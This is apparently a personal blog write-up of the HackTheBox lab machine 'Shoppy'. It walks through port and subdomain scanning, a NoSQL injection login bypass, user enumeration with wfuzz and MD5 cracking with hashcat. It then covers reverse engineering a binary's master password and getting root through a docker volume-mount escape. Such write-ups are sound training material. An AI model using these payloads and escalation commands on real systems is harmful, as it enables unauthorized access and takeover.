dennis@home:~$

Archive

About

RSS

    Shoppy HackTheBox

    recon

    # nmap -sC -sV -Ao nmap 10.10.11.180

# Nmap 7.92 scan initiated Thu Sep 29 08:59:36 2022 as: nmap -sC -sV -Ao nmap.again 10.10.11.180
Nmap scan report for 10.10.11.180
Host is up (0.019s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
|   256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_  256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp open  http    nginx 1.23.1
|_http-server-header: nginx/1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 29 09:00:05 2022 -- 1 IP address (1 host up) scanned in 29.38 seconds

    open ports

    • 22 = ssh
    • 80 = nginx http

    enumerating directories and subdomains

    # find directories
gobuster dir -u http://shoppy.htb -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt

# find subdomains
gobuster dns -w /usr/share/seclists/Discovery/DNS/namelist.txt -t 50 -d shoppy.htb

    These scans reveals that there is a login page under shoppy.htb/login and asubdomain mattermost

    nosql injection

    The login site is vulnerable to nosql injection which can be exploited when submitting admin'||'1==1 as username.

    By logging in we can search for users and get the hashed password. We now the user admin exists because we used his username in the nosql injection so we know how a positive search result looks like.

    With this information we can look for other users with wfuzz

    get users with wfuzz

    wfuzz -c -z file,/usr/share/seclists/Usernames/Names/names.txt -L --hh 2561 --hc 500 -b "Cookie: rl_user_id=RudderEncrypt%3AU2FsdGVkX1%2FU2e5ivWS313EqHejrDqmqWBOz%2B7JiK1ZGG8%2F1YJwbMqu75MRDE0GU; rl_anonymous_id=RudderEncrypt%3AU2FsdGVkX1%2FUY9maqReUKFXmGrrT34nxbATStnx0je7zCF90BWcHFlQ0UyMBoDkHwtnp1WJHOC9wgPADeoHzXw%3D%3D; rl_group_id=RudderEncrypt%3AU2FsdGVkX18zrc11pNHh3MGWXwjk8h1haEPxMCFoUas%3D; rl_trait=RudderEncrypt%3AU2FsdGVkX1%2BvmEdwpOw3wnRMj5AHU%2BCwhP1yuW80jog%3D; rl_group_trait=RudderEncrypt%3AU2FsdGVkX18s9pN%2BNQ675PZeUnKOiPXIxXeioQcUDB8%3D; connect.sid=s%3A9xH10SZ2ZaAI3nOvgVp8GSxULBvnaDUp.e%2BkKff%2B%2BDrQhWq5D35SR4qy4jYNJraJLAzGmS9ByjEw" http://shoppy.htb/admin/search-users\?username\=FUZZ

    Important here is to follow the request with the -L argument and to give it the header value with the -b argument. I was struggeling a bit with it because it always returned the same results until I tried it with curl and recognized that the request needs the cookie to success.

    When using right the resulting users are admin which we already knew and josh

    000000086:   200        55 L     160 W      2720 Ch     "admin"
000004909:   200        55 L     160 W      2720 Ch     "josh"

    When clicking on “Download Export” we get an id, username and a hashed password. By looking at the length of the hashed password we can recognize that it is 32 chars long which can be a indication for the weak md5 hashing alogorithm.

    cracking found passwords

    Using hashcat we have to store the two hashes from admin and josh in a file hash.txt By runnig hashcat hash.txt we can determine what kind of hash it could be and so make sure that the md5 assumption is right. To crack the passwords run:

    hashcat -m 0 --show hash.txt rockyou.txt

    getting user level

    So we get the password for josh which we can use for the subdomain mattermost.Here we can login as josh and by looking around there are credentials for jaeger which we can use to ssh into the box and get the user.txt.

    privilege escalation

    By running sudo -l we can examine which commands the user can execute.
    We find the executable /home/deploy/password-manager which we can run as the deploy user.

    sudo -u deploy /home/deploy/password-manager`

    We are asked about a master password which we can reverse engineer.

    reverse engineering master password

    By copying the executable to the loacl maschine we can inspect it with the tools we are familiar with. First I tried to get the strings in it to look if the password where used in clear text in the source code.

    strings password-manager

    Unfortunately no success with it.

    To continue we can use radare2 to get more information about the executable.

    r2 password-manager
aaa
s main 
VV

    In the now presented callflow we can find a string Sample.

    So we can authenticate in the password-manager with this master password and we get the credentials for the deploy user.

    We can now login as deploy by executing su deploy

    getting root

    Still no permissions to access /root so we have to continue…

    By looking around be can find out that we can docker without super user rights. So we look for docker in GTFOBins to bypass security restrictions and find this.

    To become root we run the command explained at the bottom of the site.

    docker run -v /:/mnt --rm -it alpine chroot /mnt sh

    Voila. We are root